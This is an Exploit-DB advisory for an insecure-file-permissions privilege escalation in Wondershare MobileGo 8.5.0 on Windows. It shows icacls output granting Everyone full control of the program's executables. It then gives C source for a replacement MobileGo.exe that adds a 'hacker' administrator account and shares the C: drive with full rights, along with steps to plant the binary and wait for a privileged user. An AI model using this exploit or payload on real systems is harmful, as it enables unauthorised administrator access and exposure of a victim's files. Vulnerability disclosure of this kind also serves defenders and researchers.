MobileGo 8.5.0 - Insecure File Permissions

EDB-ID:

47667

CVE:

N/A


Author:

ZwX

Type:

local


Platform:

Windows

Date:

2019-11-18


# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-15
# Vendor Homepage : https://www.wondershare.net/
# Software Link: https://www.wondershare.net/mobilego/
# Tested on OS: Windows 7 


# Proof of Concept (PoC):
==========================
C:\Program Files\Wondershare\MobileGo>icacls *.exe
adb.exe Everyone:(I)(F)
        AUTORITE NT\Système:(I)(F)
        BUILTIN\Administrateurs:(I)(F)
        BUILTIN\Utilisateurs:(I)(RX)

APKInstaller.exe Everyone:(I)(F)
        AUTORITE NT\Système:(I)(F)
        BUILTIN\Administrateurs:(I)(F)
        BUILTIN\Utilisateurs:(I)(RX)

BsSndRpt.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

DriverInstall.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

fastboot.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

FetchDriver.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

MGNotification.exe Everyone:(I)(F)
                   AUTORITE NT\Système:(I)(F)
                   BUILTIN\Administrateurs:(I)(F)
                   BUILTIN\Utilisateurs:(I)(RX)

MobileGo.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

MobileGoService.exe Everyone:(I)(F)
                    AUTORITE NT\Système:(I)(F)
                    BUILTIN\Administrateurs:(I)(F)
                    BUILTIN\Utilisateurs:(I)(RX)

unins000.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

URLReqService.exe Everyone:(I)(F)
                  AUTORITE NT\Système:(I)(F)
                  BUILTIN\Administrateurs:(I)(F)
                  BUILTIN\Utilisateurs:(I)(RX)

WAFSetup.exe Everyone:(I)(F)
             AUTORITE NT\Système:(I)(F)
             BUILTIN\Administrateurs:(I)(F)
             BUILTIN\Utilisateurs:(I)(RX)

WsConverter.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)

WsMediaInfo.exe Everyone:(I)(F)
                AUTORITE NT\Système:(I)(F)
                BUILTIN\Administrateurs:(I)(F)
                BUILTIN\Utilisateurs:(I)(RX)
				
				
				
#Exploit code(s): 
=================

1) Compile below 'C' code name it as "MobileGo.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0);
return 0;
} 

2) Rename original "MobileGo.exe" to "~MobileGo.exe"
3) Place our malicious "MobileGo.exe" in the MobileGo directory
4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE. 
Privilege Successful Escalation